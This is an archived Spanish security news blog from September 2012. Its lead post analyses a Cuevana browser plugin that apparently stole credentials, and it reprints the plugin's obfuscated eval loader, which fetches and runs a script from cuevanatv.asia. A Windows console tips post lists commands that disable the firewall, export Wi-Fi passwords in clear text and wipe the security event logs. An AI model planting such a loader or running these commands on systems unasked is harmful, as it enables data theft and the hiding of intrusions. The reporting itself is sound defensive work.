Archivo

Archive for 17 septiembre 2012

¿El plug-in de Cuevana roba información financiera?

septiembre 17, 2012 Deja un comentario
Actualización: es probable que el script del plugin haya sido modificado por un tercero, ajeno a Cuevana. Lee el post hasta el final.

Cuevana, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de “phising” (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene código malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.

Al parecer, al intentar visionar contenido de su sitio, este pide autorización para instalar un complemento (plugin) para tu navegador (tanto Firefox como Chrome). Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web hxxp://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.

Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin “Cuevana Streaming”. Después de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.

Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip, etc.), despues abre el archivo “script-compiler.js” que encontrarás en la carpeta “content”. Una vez abierto ese archivo observa la linea número 232.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))

Actualización 19:00: confirmado, en Firefox, cualquier versión, está infectado con el código malicioso que roba datos. También estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios.

Actualización 19.30: descomprimir el XPI con WinRar (hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi) (NO LO INSTALE).

Entrar en la carpeta “content” y mirar la linea 232 del archivo “script-compiler.js”. La url maliciosa es hxxp://cuevanatv.asia/back3.js.

Actualización 19.50:  han cambiado al código fuente del plugin. El plugin original para analizarlo se encuentra aquí.

Actualización 19.57: el nuevo plugin (diferente pero con la misma versión para que no se sospeche ) ya no roba datos. En el Tamper Data ya no da el aviso que daba antes. Han borrado la línea maliciosa del código para ocultar las pruebas. En el hilo de Foro Coches se puede encontrar el fichero original con el código malicioso, como prueba. Esto quiere decir que han borrado u ocultado la parte del código maliciosa.

Actualización 21:00: he analizado el código fuente de la versión 4.2 instalado en mi propia computadora hace tiempo (más de un mes) y la misma versión 4.2 modificada y efectivamente se observa la diferencia en el código fuente. A continuación dejo los dos fuentes:

Versión instalada hace un mes
Versión modificada

En Windows Vista o superior, el plugin lo puedes encontrar en: C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\\

La diferencia en el código podría indicar que:

El tiempo dirá.

Actualización 21:50: Cuevana está investigando el tema y recomienda desinstalar el plugin, e instalarlo nuevamente. Además se deben cambiar todas las contraseñas.

Fuente: Foro Coches y Galacticow Segu-Info

 

Anuncios
Categorías:Malware, Noticias Etiquetas: , ,

Se viene la 8va ekoparty – Conferencia de Seguridad en Argentina

septiembre 11, 2012 Deja un comentario

La ekoparty se realiza anualmente en la Ciudad Autónoma de Buenos Aires en donde asistentes, invitados, especialistas y referentes de todo el mundo tienen la oportunidad de involucrarse con innovación tecnológica, vulnerabilidades y herramientas en un ambiente distendido y de intercambio de conocimientos.

FECHA: 19, 20, 21 de Septiembre 2012

Abiertas las inscripciones – Vacantes Limitadas

http://www.ekoparty.org

ekoparty – Electronic Knock Out Party – Security Conference, es el evento anual de seguridad informática que, por sus características únicas y estilo, se ha convertido en referente para toda Latinoamérica.

“La Conferencia de Seguridad Informática más importante de América Latina.”

La idea de realizar un evento con estas particularidades surgió en el circuito underground de IT, pero con el transcurso de las ediciones, logró posicionarse como la conferencia técnica de seguridad mas grande de Latinoamérica. Además de poseer relevancia internacional y contar con una amplia audencia técnica especializada, la ekoparty ofrece entrenamientos, con los profesionales más reconocidos del mercado, actividades paralelas y desafíos.

Además de brindar un espacio único para el intercambio de conocimientos, la ekoparty provee una serie de actividades, dinámicas y distendidas, relacionadas a lo lúdico y la seguridad informática.

  • Desafío de Lockpicing;
  • Wardriving en Buenos Aires;
  • Wargames;
  • Zona de relax;
  • Exposición y actividades relacionadas con el arte digital;
  • Tiempo para GetTogether;
  • Promoción de la red Social.

Como ekoparty se caracteriza por sus conferencias y ambiente relajado, brindamos a los asistentes el GetTogether, luego de la primera jornada y un AfterCon Party de cierre al terminar la semana.

“Reunirse y disfrutar de los descubrimientos más importantes en seguridad informática”

Ediciones anteriores

La 5ta edición se llevó a cabo con gran éxito, mostrando un amplio crecimiento tanto en convocatoria como en la calidad expuesta en las distintas presentaciones técnicas.

Perfil.com

Actitud. Los hackers argentinos la mayoría hombres jóvenes abandonaron en los últimos años su actitud “underground” y la reemplazaron por un “activismo sin fronteras” […]
La más conocida del “mundo under” es la ekoparty, que se realizó recientemente en Buenos Aires y contó con la presencia de hackers reconocidos de seis países de la región.

Clarin
En ekoparty habitan jefes de seguridad de empresas y estudiantes de sistemas. Y discuten sobre cómo ingresar a sistemas ajenos y cómo defenderlos de posibles ataques. También hay charlas. […]
Lo que une a los asistentes es la intención de intercambiar conocimientos sobre las últimas vulnerabilidades de todo tipo de sistemas, desde operativos para PC, hasta de consolas de juegos.

Next IT
Mucha organización por parte de sus integrantes hacía notar que sabían cómo hacer una conferencia de nivel internacional con mucho esfuerzo y entusiasmo. Un evento como este hace que muchas miradas están puestas en Argentina y que la ekoparty tome carácter internacional estando a la altura de otras conferencias de seguridad…

Hispasec
Un evento de nivel internacional con speakers extranjeros y locales, invitados de Latinoamérica y el mundo. Con excelencia en la elección de temas a tratar, debates y participación directa del público. Este es el perfil de una conferencia de seguridad informática diferente, en donde lo comercial queda a un lado finalmente la tecnología, la información y la diversión son los protagonistas.

Por: Eduardo Natali

Fuente: https://hackersenlared.wordpress.com

http://www.ekoparty.org/

Categorías:Noticias Etiquetas: ,

Falsa aplicación WhatssApp disponible en Facebook

septiembre 5, 2012 Deja un comentario

La aplicación WhatssApp no está disponible en Facebook

Importancia: 2 – Baja / Fecha de publicación: 21/08/2012
Recursos afectados: Usuarios de la red social Facebook que accedan a la aplicación falsa.

Descripción
Se han detectado en la red social Facebook aplicaciones falsas de WhatsApp diseñadas para obtener datos personales de los usuarios, redirigirlos a páginas web fraudulentas, mostrarles publicidad no deseada en sus biografías o enviar correo spam a sus contactos. Hay que estar muy atentos y no dejarse engañar con trucos de ingeniería social ya que, a día de hoy, WhatsApp no está disponible para Facebook.

Imagen aviso seguridad no técnico

Solución

Si acepto la aplicación en Facebook debe eliminarla lo antes posible. Para ello, sigue los pasos que encontrará en la sección de ayuda de la red social «¿Cómo puedo quitar o eliminar una aplicación de mi cuenta?».

Si desea denunciar la aplicación, puede hacerlo desde la siguiente página: «Notificación de incumplimiento de derechos por parte de una aplicación»

Para evitar ser engañado con trucos de ingeniería social, es conveniente aplicar recomendaciones de seguridad:

  • Usar sentido común y no hacer clic en cualquier cosa que veamos en las redes sociales.
  • Utilizar un analizador de enlacesantes de hacer clic en cualquier url para comprobar si ésta te lleva a una página legítima.
  • Nunca abrir mensajes de usuarios desconocidos o que no se hayan solicitado, eliminarlos directamente.
  • No contestar en ningún caso a estos mensajes.
  • Contrastar la información siempre en fuentes de confianza para evitar ser engañado en Internet con falsos mensajes.

Puedes ayudarnos a combatir este tipo de fraudes enviándonos un correo a: Correo electrónico

Ante cualquier duda, puede solicitar ayuda a través de nuestro servicio de Soporte por Chat o Atención telefónica.

Detalle

Como ya hemos visto en otras ocasiones, las redes sociales son utilizadas frecuentemente para engañar a los usuarios con mensajes, páginas y aplicaciones falsas utilizando para ello la ingeniería social.

Esta vez es Facebook la que está siendo utilizada por los delincuentes para propagar aplicaciones falsas de WhatsApp. Aprovechando el gran éxito que está teniendo la aplicación para móviles, se están creando supuestas aplicaciones de Facebook que te permiten chatear con tus contactos móviles.

Un ejemplo de cómo funcionan estas aplicaciones falsas:

  • Accedes a la página de presentación de la aplicación falsa y la descargas.Imagen aviso seguridad no técnico
  • La aplicación solicita permiso para acceder a la información básica de la biografía y a la dirección de correo electrónico que se tenga asociada a la cuenta de Facebook. Se acepta pulsando «Iniciar sesión con Facebook».Imagen aviso seguridad no técnico
  • Supuestamente realizando los pasos anteriores se instalaría la aplicación de WhatsApp para Facebook… sin embargo, salta una ventana con mensaje de error.Imagen aviso seguridad no técnico

Evidentemente no se puede instalar la aplicación porque no existe. Es un simple truco para acceder a la información personal del usuario. Así los delincuentes podrán utilizarla a su antojo.

Fuente: INTECO

Los 10 mejores sitios web en español sobre seguridad de la información

septiembre 5, 2012 Deja un comentario

Como he notado que muchos de los lectores de mi blog provienen de países de habla hispana, me pareció interesante buscar algunos sitios Web en este idioma que puedan resultar de utilidad. Y esto es lo que encontré; los blogs y demás sitios Web que, en mi opinión, ofrecen el mejor contenido sobre seguridad de la información en español (detallados por orden alfabético):

HackersEnlaRed
Blog dedicado a noticias de seguridad informática y tecnologías de la información.

Apuntes de seguridad de la información
Blog dedicado a la protección de datos personales y a la gestión de la seguridad de la información.

Cryptex – Seguridad de la Información
Blog dedicado a la seguridad de la información, privacidad, seguridad y auditoría de TI: recopilación de principales noticias, eventos, políticas de seguridad, guías de buenas prácticas, normas, estándares, herramientas, etc.

Instituto Nacional de Tecnologías de la Comunicación (INTECO)
Diversas noticias y artículos informativos sobre seguridad: incluye una biblioteca con artículos, estudios y guías.

ISACA en español
Una biblioteca con gran cantidad de documentos útiles en español.

Kriptópolis – Criptografía y Seguridad
Revista independiente en línea sobre seguridad en Internet; su objetivo es ayudar a proteger la privacidad y la seguridad de los usuarios de Internet y facilitar la difusión de diversas herramientas con esta finalidad.

Security Art Work
Un blog con artículos relacionados con la gestión de áreas como SGSI, continuidad del negocio y protección de privacidad de datos, información técnica sobre vulnerabilidades lógicas y fortalecimiento de redes y de aplicaciones, tendencias y amenazas actuales y futuras.

Security by Default
Blog sobre seguridad en TI dedicado a compartir experiencias y a discutir cuestiones técnicas relacionadas con la seguridad informática.

Segu-Info
Blog actualizado diariamente que se dedica a todas las áreas en la esfera de la seguridad. Su objetivo es hacer que la seguridad sea un tema accesible tanto para los profesionales como para los usuarios finales. Publica un boletín mensual con artículos originales de diversos autores.

Subdirección de Seguridad de la Información
Sitio Web centrado en noticias y alertas sobre seguridad de TI, pero también ofrece listas de vulnerabilidades y diversos documentos.

Xavier Ribas Blog
Blog dedicado a los aspectos legales en la tecnología de la información y, particularmente, en la seguridad de la información.

This post is also available in: Inglés

Autor: Dejan Košutić
Fuente: blog.iso27001standard.com

Trucos para la consola de Windows

septiembre 5, 2012 Deja un comentario
Tomo prestada la idea del magnífico blog de Open Security Research para, imitando a las antiguas revistas de papel, publicar algunos trucos de la famosa línea de comandos de Windows 7/2008. Algunos más enfocados a seguridad, otros simplemente prácticos.
1.- Ejecutar CMD como Administrador.
Aunque realmente sirve para cualquier comando, si se pulsan las teclas control+shift y la tecla enter,  una vez se ha buscado por “cmd” en el buscador de Windows 7, directamente se ejecutará con permisos de Administrador. Es una tontería, pero una vez te acostumbras, desplegar las opciones con el botón derecho del ratón para irse sobre “Ejecutar como administrador”, se vuelve casi molesto.
2.- Configuración del firewall.
El comando netsh (Network Shell), sirve para manejar la configuración de red del sistema. Es bastante completo y permite definir un interfaz con direccionamiento DHCP, con una IP estática o incluso mostrar la configuración del firewall de un perfil.
Para ver un resumen: netsh advfirewall show currentprofile
Para obtener las reglas del firewall: netsh advfirewall firewall rule name=all
Para deshabilitarlo: netsh firewall set opmode disable
3.- Restablecer Winsock2 y TCP/IP.
Con netsh también se puede restablecer la configuración de Winsock2 y TCP/IP si se detectan problemas de conectividad y algunos expedientes X de red (esas cosas que pasan a veces en Windows y que no se solucionan mirando el /var/log/messages)
4.- Contraseña de una conexión Wireless en texto claro.

Mediante el mismo netsh existe la opción de generar un fichero de configuración del perfil actual de la conexión de la configuración wireless. Este fichero almacenará en texto claro (en formato hexadecimal), la contraseña que utiliza el sistema para conectarse al punto de acceso.
Guardar la configuración en el directorio actual: netsh wlan export profile folder=. key=clear


5.- Borrar registro de eventos.

Con el comando wevtutil se gestionan los logs de los sistemas Windows, configuración, borrado, almacenamiento, etcétera. Es bastante completo y para aprender a usarlo nada como leerse su documentación.

Para eliminar los registros de Seguridad, System y Application:

  • wevtutil cl “Security”
  • wevtutil cl “System”
  • wevtutil cl “Application”

 

6.- Datos del sistema de WMI.
Utilizando el comando wmic es posible hacer consultas al Windows Management Instrumentation (WMI), que entre otras cosas, almacena decenas de tablas con información sobre el sistema.

 

Algunos ejemplos:
  • Lista completa y detallada de usuarios: wmic useraccount list full
  • Lista de usuarios de sistema: wmic sysaccount list full
  • Direcciones IP y nombres de interfaz de red: wmic nicconfig get index,description,ipaddress
  • Lista de procesos (sustituto de tasklist): wmic process list brief

 

7.- Modificar el prompt.

Al igual que en Linux se modifica el PROMPT con la variable PS1, en Windows es posible con el comando prompt.

  • Prompt por defect: prompt $p$g
  • Prompt con el nombre del sistema, de usuario y la ruta: prompt [%computername%] [%username%] $p$g
 
8.- Cambiar color de la terminal.
Para cambiar los colores de la consola no hace falta irse a las propiedades, desde línea de comando y con un simple “color 0a“, estaremos en un viejo fósforo P1 a lo Matrix.
El “0” representa el color de fondo (negro) y la “a”, el verde de las letras. Con color /? se consultan todas las posibilidades. Otra mucho más útil: color f0, blanco sobre negro, muy práctica para las capturas de pantalla.
9.- Consultar los ficheros que abre cada proceso.
En Windows también se puede averiguar (sin necesidad de herramientas como handle de sysinternals) los ficheros que están abiertos por cada proceso al igual que se hace en Linux con lsof.

Primero se habilita openfiles con la instrucción: openfiles /local on


Una vez se reinicia el sistema (esta es la única pega), tan solo hace falta ejecutar el comando: openfiles

 
 
10.- Cambiar el tamaño de la consola.

Ya que el propio cmd no deja redimensionarse horizontalmente, para hacerlo directamente desde el propio cmd sin tener que abrir sus propiedades, se utiliza el comando: mode, seguido de las columnas y líneas que se desean:

Establecer una ventana de 80 caracteres de columna y 40 líneas: mode 80,40

 

11.- Comparar archivos de texto y buscar textos

También es posible comparar archivos de texto usando fc, que mostrará las diferencias entre ambos, similar al comando diff de sistemas unix:

Diferencias entre el archivo 1.txt y 2.txt (uno tiene la letra d y otro no): fc 1.txt 2.txt

También es posible buscar una cadena de texto pasando por una tubería con el comando “find“, tal y como se hace con grep:

  • Buscar los archivos que contengan la cadena ‘dll’: dir | find “dll”
  • Una alternativa es usar el comando findstr
12.- Copias incrementales de ficheros.

Para copiar un directorio y todo su contenido recursivamente, pero tan solo aquellos ficheros que no estén en el destino. Es decir, incrementalmente y manteniendo fechas de timestamp, se puede usar el comando robocopy.

Copia del directorio c:\tmp al directorio c:\tmpbackup:

robocopy c:\tmp c:\tmpbackup /copyall /dcopy:t /mir

13.- Histórico de comandos.
Tan solo pulsando la tecla F7 se abrirá un pseudo pop-up con los últimos comandos ejecutados. Al igual que ocurre cuando se pulsa sobre la tecla de cursores arriba, solo que visualmente.

14.- Averiguar qué proceso abre un puerto.
En Windows 7/2008 existe la posibilidad de conocer cuál es el proceso que está haciendo bind de un determinado puerto con el comando netstat. Tal y como hace el famoso tcpview, solo que desde línea de la terminal.
Para listar todos los puertos y mostrar los ID del proceso que lo usa: netstat -ano
Posteriormente se usa “tasklist” para listar los procesos y “findstr” para filtrar el contenido en base a una cadena de texto.
15.- Copiar al portapapeles la salida de un comando.
Para almacenar la salida de un comando en el portapales directamente, tan solo hay que usar una tubería y el comando clip
 

Fuente: SecurityByDefault

http://www.securitybydefault.com/2012/09/trucos-para-la-consola-de-windows.html

Categorías:Noticias, Windows Etiquetas: , , ,

Pueden espiar todo lo que haces en Internet

septiembre 5, 2012 Deja un comentario

¿Conoces todos los riesgos que corres al compartir información personal o ingresar tus datos en la web? Un experto explica cómo puedes protegerte

 

 

“El problema de la seguridad en Internet tiene dos grandes factores. El externo, que son los delincuentes informáticos que quieren todo el tiempo penetrar en tu computadora y robar tus datos. Y el interno, que es el más grave: la ignorancia del usuario al navegar por Internet”, afirmó el argentino Miguel Sumer Elías, abogado especializado en derecho informático, en diálogo con Infobae América.

 

 

Más conectados, más desprotegidos

 

Con la generalización del acceso a la web y la proliferación de las redes sociales y de los servicios de trámites online, las personas ingresan en sus computadoras conectadas todo tipo de información sensible. Fotos, videos, direcciones, teléfonos, contraseñas bancarias y muchas otras cosas dejaron de quedar circunscriptas al hogar.

 

La gente no está siendo educada para vivir en esta realidad -contó Elías. El usuario hace click en cualquier cosa, descarga cualquier archivo, sube cualquier imagen y publica cualquier dato personal. También agrega gente indiscriminadamente en Facebook y le comparte lo mismo que a sus mejores amigos. Se le da al mundo entero información sobre cuestiones muy íntimas y eso es muy grave”.

 

Una muestra del desconocimiento que tienen los usuarios es que suelen confundir cuáles son los verdaderos riesgos. Esto se ve en el temor a que la PC sea contagiada por un virus.

 

El concepto de virus es viejo, pertenece a los ochenta y noventa. Antes era muy común escuchar que a alguien le había entrado un virus en la computadora y le había borrado todo. Eso ahora no pasa. El problema es el malware, que es software malicioso. Son programas de computación que infectan las computadoras, de los cuales sólo el 2 por ciento son virus”.

 

“La diferencia es que el virus es vandálico, te borra todos los archivos. Mientras que programas como los troyanos no te impiden usar la PC, pero te espían todo lo que haces. Entonces, las personas están tranquilas porque sus computadoras no tienen virus, pero no se dan cuenta de que están totalmente infectadas”, precisó Elías.

 

Por ejemplo, la posibilidad de hacer trámites bancarios online acortó los tiempos, ya que evita ir al banco en muchos casos. Pero eso no significa que uno puede conectarse y consultar su saldo o realizar una transferencia desde cualquier lugar.

 

“Las PC de los cibercafés está 100 por ciento contaminadas con troyanos. Si uno ingresa la clave de su homebanking allí, está firmando que la obtenga otra persona”.

 

 

De los conflictos reales a los conflictos digitales

 

Más allá del daño que puedan causar los delincuentes informáticos, pendientes de los descuidos para aprovecharse, hay otro universo de problemas relacionados con la información personal que navega en la red.

 

Con el uso masivo de las redes sociales, las personas comparten voluntariamente mucha información, sin darse cuenta de que eso puede ser usado en su contra.

 

De hecho, Elías contó cuáles son las principales consultas que recibe como abogado, y no es el robo informático lo que más aparece.

 

“Los conflictos en el mundo físico se trasladaron al mundo digital, y se potenciaron. Por ejemplo, en otra época, si un cónyuge engañaba a otro, el damnificado lo insultaba reunido con sus amigos. Hoy, el despechado arma un sitio web o comparte fotos en Facebook con información negativa y fotos privadas de su ex, y así destruye su reputación”.

 

Para enterarte de los riesgos que tiene el uso de la web y de cómo puedes protegerte, no te pierdas el próximo jueves 6 de septiembre la entrevista en vivo con Miguel Sumer Elías y el abogado mexicano Joel Gómez a través de América Directo (a las 11:30 hora Buenos Aires, 10.30 de Caracas y 9.30 de México DF). Envíales tus preguntas ingresando aquí.

 

Fuente: Infobae